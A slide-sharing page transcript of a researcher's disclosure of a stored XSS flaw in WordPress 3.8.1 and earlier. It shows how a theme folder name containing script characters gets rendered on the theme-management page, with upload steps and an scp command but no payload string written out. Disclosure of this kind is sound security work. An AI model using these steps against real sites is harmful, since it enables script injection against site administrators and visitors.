Wordpress 3-8-1-stored-xss
3
Click here to load reader
-
Upload
mehmet-ince -
Category
Technology
-
view
1.085 -
download
0
description
wordpress 3.8.1 stored xss.
Transcript of Wordpress 3-8-1-stored-xss
####################################################################### Wordpress <= 3.8.1 Stored XSS (Requires Admin Privileges)## Author : Mehmet Dursun INCE - [email protected]# Job : Pentest Leader at IntelRAD.# Twitter: @mmetince# Found : 9 Feb # Tested on: Wordpress 3.8.1 on CentOS.######################################################################
Vulnerability Discover:
First of all, i want to remind that you need a privileges to upload new theme at wordpress server side via ftp/sftp or wordpress gui.
1 - Wordpress checks themes for compatibility. if it's not compatible then wordpress will warnyou under the "Broken Themes" segment at theme management page.
2 - "test" is the folder name of the theme that you wanna add to wordpress. But also it means that you can inject XSS payload via folder name.As you know, we can use <,>," or other character in folder name -only if you are using linux.-
3 – Lets create a “broken theme”. That is easy to create because we know that Wordpress need to see Stylesheet file.
4 - Let's upload that folder to under /[wordpress_full_path]/wp-content/themes.
5 - I uploaded that folder via sftp.
mince@rootlab:/tmp$ scp xss.zip [email protected]:/[wp-full-path]/wp-content/themesxss.zip 100% 194 0.2KB/s 00:00 mince@rootlab:/tmp$
6 – See our malformed theme under the themes folder.
7 - Decompress it.
8 – Lets refresh theme page.
9 – EOF!
